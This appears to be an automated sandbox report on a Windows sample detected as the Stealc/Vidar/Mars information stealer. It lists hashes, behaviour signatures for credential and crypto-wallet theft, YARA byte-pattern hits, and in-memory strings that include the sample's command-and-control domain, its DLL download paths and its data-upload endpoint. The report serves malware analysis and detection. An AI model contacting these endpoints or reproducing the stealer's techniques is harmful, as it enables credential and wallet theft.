Edit tour

Windows Analysis Report
c4RAHq3BNl.exe

Overview

General Information

Sample name:	c4RAHq3BNl.exe renamed because original name is a hash value
Original sample name:	5451fddd7b59b191df90b89a06ef1691.exe
Analysis ID:	1435676
MD5:	5451fddd7b59b191df90b89a06ef1691
SHA1:	c8e14fb63a8270a86be838a3a7421207e288b63e
SHA256:	5bbf9fcd8089681980082a04c01123473ab38328873ca7af33e8f9bd80402fe5
Tags:	32exetrojan
Infos:

Detection

Mars Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected Mars stealer

Yara detected Stealc

Yara detected Vidar stealer

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

c4RAHq3BNl.exe (PID: 6488 cmdline: "C:\Users\user\Desktop\c4RAHq3BNl.exe" MD5: 5451FDDD7B59B191DF90B89A06EF1691)

chrome.exe (PID: 3148 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2220 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2024,i,11327387611839351283,1554127739086396422,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7764 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2024,i,11327387611839351283,1554127739086396422,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.3252549703.0000000002C00000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.3253194154.0000000002D37000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1150:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.3253231068.0000000002D60000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x15b0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.3252916519.0000000002C80000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.3252916519.0000000002C80000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000000.00000002.3252916519.0000000002C80000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.2826944612.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000003.2826944612.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000000.00000002.3253248628.0000000002D76000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: c4RAHq3BNl.exe PID: 6488	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: c4RAHq3BNl.exe PID: 6488	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: c4RAHq3BNl.exe PID: 6488	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.c4RAHq3BNl.exe.2c80e67.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.c4RAHq3BNl.exe.2c80e67.2.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.3.c4RAHq3BNl.exe.2cb0000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.3.c4RAHq3BNl.exe.2cb0000.1.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.3.c4RAHq3BNl.exe.2cb0000.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.3.c4RAHq3BNl.exe.2cb0000.1.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.2.c4RAHq3BNl.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.c4RAHq3BNl.exe.400000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.2.c4RAHq3BNl.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.c4RAHq3BNl.exe.400000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.2.c4RAHq3BNl.exe.2c80e67.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.c4RAHq3BNl.exe.2c80e67.2.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
Click to see the 7 entries

HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900D492X-BM-CBT: 1696428841X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900D492X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticshX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2484Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1714694808007&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF

Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: c4RAHq3BNl.exe, c4RAHq3BNl.exe, 00000000.00000002.3276907744.000000006C73D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: c4RAHq3BNl.exe, 00000000.00000002.3276790097.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3266507871.000000001D51A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: c4RAHq3BNl.exe, 00000000.00000003.2920893249.000000001D48A000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: c4RAHq3BNl.exe, 00000000.00000003.2920893249.000000001D48A000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: c4RAHq3BNl.exe, 00000000.00000003.2920893249.000000001D48A000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: c4RAHq3BNl.exe, 00000000.00000003.2920893249.000000001D48A000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: c4RAHq3BNl.exe, 00000000.00000003.2920893249.000000001D48A000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: c4RAHq3BNl.exe, 00000000.00000003.2920893249.000000001D48A000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: c4RAHq3BNl.exe, 00000000.00000003.2920893249.000000001D48A000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.co
Source: c4RAHq3BNl.exe, 00000000.00000002.3253214471.0000000002D5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com
Source: c4RAHq3BNl.exe, 00000000.00000003.2899780366.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/
Source: c4RAHq3BNl.exe, 00000000.00000003.2864517080.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2855764603.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2899867172.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2899830215.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2899780366.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/(
Source: c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/32e011d2eaa85a0/nss3.dll
Source: c4RAHq3BNl.exe, 00000000.00000003.2864517080.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2899867172.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2899830215.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2899780366.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/:
Source: c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/AKJDHJKFHIEBFCGHCGHDGC
Source: c4RAHq3BNl.exe, 00000000.00000003.2864517080.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2855764603.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2899867172.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2899830215.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000003.2899780366.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/L
Source: c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/M%
Source: c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/amData
Source: c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D410000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll
Source: c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D410000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll)
Source: c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll/$oT
Source: c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll
Source: c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/mozglue.dllG#
Source: c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dll
Source: c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002D76000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/nss3.dll
Source: c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/nss3.dll3
Source: c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/softokn3.dll
Source: c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dllg$
Source: c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dllu#
Source: c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D410000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dll
Source: c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dll8
Source: c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/d3e
Source: c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/fatta.com/
Source: c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/fatta.com/DGIDAKEBAAKFCGHCBAKJDA
Source: c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/fatta.com/X
Source: c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002D76000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp, c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/fdca69ae739b4897.php
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://shaffatta.com/fdca69ae739b4897.php8ec24d29b45ae0b00693c3ad9a656
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpiYW4qLCpjYXJkcyosKmJhbmtzKiwqY3Z2KiwqY3ZjKiwqYWNjb3VudCosK
Source: c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpindows
Source: c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpnts
Source: c4RAHq3BNl.exe, 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phption:
Source: c4RAHq3BNl.exe, 00000000.00000002.3266404639.000000001D4EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/ktop
Source: c4RAHq3BNl.exe, 00000000.00000002.3253248628.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shaffatta.com/t%
Source: IIIDAKJDHJKFHIEBFCGHCGHDGC.0.dr	String found in binary or memory: https://support.mozilla.org
